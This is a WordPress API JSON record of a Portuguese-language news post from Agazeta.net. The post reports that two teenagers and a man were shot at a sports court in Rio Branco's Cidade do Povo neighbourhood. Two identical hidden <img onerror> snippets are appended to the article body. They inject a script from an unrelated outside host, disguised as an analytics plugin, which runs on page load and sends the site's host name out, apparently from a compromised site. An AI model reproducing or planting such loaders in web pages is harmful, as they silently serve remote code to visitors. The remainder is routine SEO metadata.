{"id":49316,"date":"2020-08-10T14:07:56","date_gmt":"2020-08-10T14:07:56","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/08\/10\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/"},"modified":"2020-08-10T14:07:56","modified_gmt":"2020-08-10T14:07:56","slug":"tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/","title":{"rendered":"Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo"},"content":{"rendered":"<p><span style=\"font-size: 13.2px;\">Pol\u00edcia Militar escoltou ambul\u00e2ncia at\u00e9 o Pronto Socorro<\/span><\/p>\n<p style=\"text-align: justify;\">Dois adolescentes e um homem foram baleados no bairro Cidade do Povo, neste final de semana. Eles foram socorridos pelo Samu, receberam os primeiros atendimentos na Unidade de Sa\u00fade do bairro e foram encaminhados para o Pronto Socorro, escoltados pela Pol\u00edcia Militar.<\/p>\n<p>Os jovens foram baleados nos membros inferiores e o homem sofreu escoria\u00e7\u00f5es leves.<\/p>\n<p>De acordo com testemunhas, as v\u00edtimas estavam junto com um grupo maior de pessoas tomando refrigerante na quadra Nove do Cidade do Povo depois de uma partida de futebol, quando cerca de dez suspeitos se aproximaram, falaram para ningu\u00e9m correr e come\u00e7aram a disparar com arma de fogo, havia crian\u00e7as no local.<\/p>\n<p style=\"text-align: justify;\">Depois dos disparos, os suspeitos fugiram. A Delegacia de Homic\u00eddios e Prote\u00e7\u00e3o a Pessoas (DHPP) vai ouvir as v\u00edtimas e dar sequ\u00eancia as investiga\u00e7\u00f5es.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p><span style=\"font-size: 13.2px;\">Pol\u00edcia Militar escoltou ambul\u00e2ncia at\u00e9 o Pronto Socorro<\/span><\/p>\n","protected":false},"author":4,"featured_media":49315,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-49316","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Pol\u00edcia Militar escoltou ambul\u00e2ncia at\u00e9 o Pronto Socorro\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-08-10T14:07:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/10-08-2020_tres-pessoas-sao-baleadas-na-cidade-do-povo.png\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/\",\"name\":\"Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/10-08-2020_tres-pessoas-sao-baleadas-na-cidade-do-povo.png\",\"datePublished\":\"2020-08-10T14:07:56+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/10-08-2020_tres-pessoas-sao-baleadas-na-cidade-do-povo.png\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/10-08-2020_tres-pessoas-sao-baleadas-na-cidade-do-povo.png\",\"width\":458,\"height\":340,\"caption\":\"10-08-2020 tr\u00eas-pessoas-s\u00e3o-baleadas-na-cidade-do-povo\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/","og_locale":"pt_BR","og_type":"article","og_title":"Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo - Agazeta.net","og_description":"Pol\u00edcia Militar escoltou ambul\u00e2ncia at\u00e9 o Pronto Socorro","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/","og_site_name":"Agazeta.net","article_published_time":"2020-08-10T14:07:56+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/10-08-2020_tres-pessoas-sao-baleadas-na-cidade-do-povo.png","type":"image\/png"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/","name":"Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/10-08-2020_tres-pessoas-sao-baleadas-na-cidade-do-povo.png","datePublished":"2020-08-10T14:07:56+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/10-08-2020_tres-pessoas-sao-baleadas-na-cidade-do-povo.png","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/08\/10-08-2020_tres-pessoas-sao-baleadas-na-cidade-do-povo.png","width":458,"height":340,"caption":"10-08-2020 tr\u00eas-pessoas-s\u00e3o-baleadas-na-cidade-do-povo"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/tres-pessoas-sao-baleadas-no-bairro-cidade-do-povo\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"Tr\u00eas pessoas s\u00e3o baleadas no bairro Cidade do Povo"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/ff6b39d54d6973bfc57f4140f659b23f","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/49316","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=49316"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/49316\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/49315"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=49316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=49316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=49316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}